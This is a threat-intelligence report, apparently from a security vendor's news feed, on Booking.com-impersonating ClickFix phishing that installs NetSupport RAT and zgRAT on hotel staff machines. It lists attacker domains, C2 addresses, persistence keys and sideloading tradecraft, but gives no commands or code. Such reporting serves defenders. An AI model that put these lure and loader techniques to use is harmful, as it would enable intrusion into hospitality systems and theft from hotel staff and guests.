Booking.com ClickFix Phishing Campaign Delivers NetSupport RAT and zgRAT
Attackers are impersonating Booking.com pages in an ongoing ClickFix phishing campaign targeting the hospitality sector, tricking users into opening the Windows Run dialog and pasting attacker-supplied PowerShell that installs remote-access malware. Recent waves used Booking.com-branded lures such as secure-extranet[.]com, redirectors including jskeowgo[.]com, and additional phishing subdomains aimed at hotel staff, with some activity specifically targeting Italian-speaking users. Researchers observed multiple payload paths: one chain deployed NetSupport RAT through a large PowerShell stage that unpacked 14 base64-encoded components and then opened the legitimate Booking.com site to preserve the pretext, while another used staged loaders, ZIP delivery, and DLL sideloading via a legitimate psl.exe binary to install zgRAT and PureHVNC.
The malware provided full remote-control capability, including shell access, file transfer, keylogging, screen capture, and webcam or audio access, and established persistence through mechanisms such as Startup-folder shortcuts and HKCU\Run keys like SystemUpdate_<VID>. Infrastructure linked to the activity included freshly registered domains obtained in batches through Chinese and Hong Kong registrars, rotating download servers, telemetry endpoints that tracked installation progress per victim, and command-and-control systems hosted across providers in Frankfurt, Russia-linked environments, and a likely bulletproof-hosting setup tied to a newly created autonomous system. Investigators also found OPSEC clues including an exposed RDP certificate leaking the hostname WIN-FLJTJKL01VM, a PDB path referencing C:\Users\Administrator\Desktop\HTCTL32\, and malware signed with a stolen *.dodo.com wildcard certificate, supporting clustering of the campaign as a financially motivated cybercrime operation using commodity RAT tooling.
Get ahead of threats like this
Mallory correlates global threat intelligence with your attack surface — know if you’re exposed before adversaries strike.
How this story unfolded
8 events from the most recent confirmed update back to the earliest known activity.
Latest NetSupport wave shows batch-registered infrastructure and OPSEC leaks
Researchers found the campaign's domains had been registered within the prior seven days through Chinese and Hong Kong registrars, with sequential registry IDs suggesting batch procurement. They also identified OPSEC artifacts including an RDP certificate on 5.188.87.49 exposing hostname WIN-FLJTJKL01VM and a PDB path referencing C:\Users\Administrator\Desktop\HTCTL32\.
New Booking.com ClickFix wave delivers NetSupport RAT
A new wave of Booking.com-themed phishing used a fake CAPTCHA ClickFix lure at secure-extranet.com to trick victims into manually running a PowerShell command. The infection chain redirected through jskeowgo.com and delivered a 9.4 MB PowerShell payload that installed 14 base64-encoded NetSupport Manager RAT components while opening the legitimate Booking.com site as cover.
Infrastructure rotation links NetSupport campaign to Frankfurt and Russian hosts
Analysis of the NetSupport RAT campaign linked two Windows Server 2022 hosts named "SMTP" on the 172.94.9.0/24 subnet in M247 Frankfurt, while the download domain later rotated to a Russian-hosted server at 77.105.133.95. Per-victim tracking IDs indicated the operator was monitoring installation start and completion across multiple victims.
NetSupport RAT v14.10 ClickFix campaign observed via applicationhost17.com
An active ClickFix/FakeCaptcha campaign was observed delivering NetSupport RAT v14.10 through either a malicious MSI installer or a PowerShell dropper that fetched a ZIP bundle from applicationhost17.com. The malware installed under %APPDATA%, created persistence with an HKCU Run key, and communicated with a live C2 over HTTP POST requests.
Researchers detail CIS-linked Booking.com zgRAT infrastructure
Breakglass Intelligence reported that the hospitality-focused campaign used 14 phishing subdomains, staging and telemetry domains, and a primary C2 at asmweosiqsaaw.com on AS208885. The report assessed the operation as a financially motivated CIS-linked cybercrime campaign rather than a nation-state activity.
Stolen dodo.com wildcard certificate abused in malware signing
The Booking.com-themed malware operation used payloads signed with a stolen *.dodo.com certificate that appeared to have CA:TRUE capabilities, enabling abuse in the delivery chain. This technical detail was identified as part of the campaign's infrastructure and tradecraft.
Threat actors deploy zgRAT/PureHVNC via Booking.com-themed ClickFix waves
During the campaign active since December 2025, operators used staged PowerShell loaders, victim fingerprinting, ZIP delivery, and DLL sideloading through a legitimate psl.exe binary loading a trojanized libpsl-5.dll. The infection chain ultimately deployed zgRAT and PureHVNC for remote access, screen control, and credential theft.
Booking.com ClickFix campaign begins targeting hospitality sector
A three-wave phishing and malware campaign impersonating Booking.com verification pages began targeting hospitality organizations, especially Italian-speaking users. Victims were tricked with ClickFix-style prompts into executing PowerShell that led to malware delivery.
Related entities
Vulnerabilities, threat actors, malware, products, organizations, and breaches Mallory has linked to this story.
Sources
7 references tracked. Mallory keeps watching after this page renders.
Same Campaign, Fresh Infrastructure: Mapping the Latest Booking.com ClickFix Wave Delivering NetSupport RAT - Breakglass Intelligence - Breakglass Intelligence
intel.breakglass.tech
Open sourceNetSupport RAT v14.10 - ClickFix Dropper Campaign via applicationhost17.com - Breakglass Intelligence - Breakglass Intelligence
intel.breakglass.tech
Open sourceBooking.com ClickFix Drops zgRAT via Stolen Dodo.com Wildcard Cert: Bulletproof Hosting, DLL Sideloading, and 14 Phishing Subdomains Targeting Hospitality - Breakglass Intelligence - Breakglass Intelligence
intel.breakglass.tech
Open sourceDon't click on that email claiming to be a disgruntled guest
theregister.com
Open sourcePhishing campaign impersonates Booking .com, delivers a suite of credential-stealing malware | Microsoft Security Blog
microsoft.com
Open sourcePhishing campaign impersonates Booking .com, delivers a suite of credential-stealing malware | Microsoft Security Blog
microsoft.com
Open sourceCybercrims target hotel staff for management credentials
theregister.com
Open sourceSee the full picture, correlated to your attack surface.
Map indicators from this story to your assets and identify affected systems in minutes.
Every observed campaign, victim, and pivot linked to actors named in this story.
Malware, exploits, and IOCs connected to the activity described here.
YARA, Sigma, and Snort rules deployed to your SIEM as soon as they’re published.
Get matching new stories delivered to your team as they break — not the next morning.
Ask questions about this story and take action on the answers.
Related stories
Other stories Mallory is tracking that overlap on entities, sources, or topic labels.
PureRAT Malware Campaign Targets Hotels and Guests via ClickFix Phishing
A sophisticated cybercrime operation has targeted the hospitality sector by compromising hotel systems through phishing emails that impersonate Booking.com communications. Attackers use the ClickFix social engineering technique to trick hotel staff into clicking malicious links or copying and pasting PowerShell commands, which results in the installation of PureRAT malware. Once installed, PureRAT provides attackers with full remote access to hotel systems, enabling them to steal professional login credentials for booking platforms and access sensitive guest reservation data. The campaign, active since April 2025, leverages both direct email phishing and drive-by downloads to infect hotel staff, with compromised hotel account access often sold on underground forums. With access to genuine hotel Booking.com accounts, the attackers launch highly convincing phishing attacks against travelers, using stolen reservation and contact details to increase the credibility of their messages. Victims are contacted via WhatsApp or email and directed to spoofed Booking.com pages designed to harvest banking information. The PureRAT malware, delivered via a previously unobserved loader variant using DLL sideloading and persistence mechanisms like the Run registry key, enables a wide range of malicious activities, including keylogging, webcam and microphone capture, and data exfiltration. Security researchers have highlighted the organized nature of the operation and the use of malware-as-a-service infrastructure, underscoring the ongoing threat to both hotels and their guests.
Mar 21, 2026
ClickFix Social Engineering Attacks Targeting European Hospitality Sector
Suspected Russian cybercriminals have launched a sophisticated phishing campaign targeting the European hospitality industry, leveraging fake Windows Blue Screen of Death (BSOD) pages to distribute malware. The attack, tracked as "PHALT#BLYX" by Securonix researchers, begins with phishing emails impersonating popular booking platforms such as Booking.com, often using reservation cancellation lures with details in Euros to specifically target hotels, hostels, and inns in Europe. Victims are directed to high-fidelity cloned websites that mimic legitimate booking services, where they encounter fake error messages and BSOD screens designed to prompt them into executing malicious commands. The campaign employs the "ClickFix" technique, which manipulates users into manually running PowerShell or shell commands under the guise of resolving system errors. This process ultimately results in the installation of the DCRat malware, a remote access trojan capable of keylogging and other malicious activities. Technical indicators, including Russian-language debug strings and infrastructure geolocated to Russia, suggest a strong Russian connection. The campaign demonstrates a blend of social engineering and technical deception, exploiting human problem-solving instincts to compromise systems within the hospitality sector during its busiest season.
Mar 21, 2026
Photo ZIP Phishing Campaign Hits Hotels With TonRAT Node.js Implant
Microsoft reported an active phishing campaign targeting hotel and hospitality organizations across Europe and Asia, using booking-, complaint-, and photo-themed emails to pressure recipients into opening malicious ZIP archives. The messages were routed through trusted services including Calendly and Google redirects, and in later activity used Cloudflare-fronted `.cfd` domains to evade detection. The ZIP files contained fake PNG shortcut (`.LNK`) files that launched obfuscated PowerShell, then installed a Node.js-based implant Microsoft tracks as **TonRAT**; Microsoft said the campaign has been active since April and evolved across multiple waves while keeping the same core infrastructure and tradecraft. On compromised systems, the attackers established persistence through `HKCU\Run` and `HKCU\RunOnce`, added Microsoft Defender process exclusions, and staged payloads in `Temp` and `ProgramData`, with some later samples dynamically compiling .NET DLLs via `csc.exe` and `cvtres.exe`. TonRAT communicated over encrypted WebSockets and used the TON blockchain API for command-and-control domain resolution, while Microsoft also observed beaconing on non-standard ports such as `56001` and `56002`, browser automation, geolocation lookups through `ip-api.com`, and forced shutdown commands. Microsoft has not attributed the activity to a known threat actor or confirmed follow-on ransomware or data theft, but said the operator is investing in obfuscation, persistence, and delivery evasion to maintain access for later actions.
Jun 27, 2026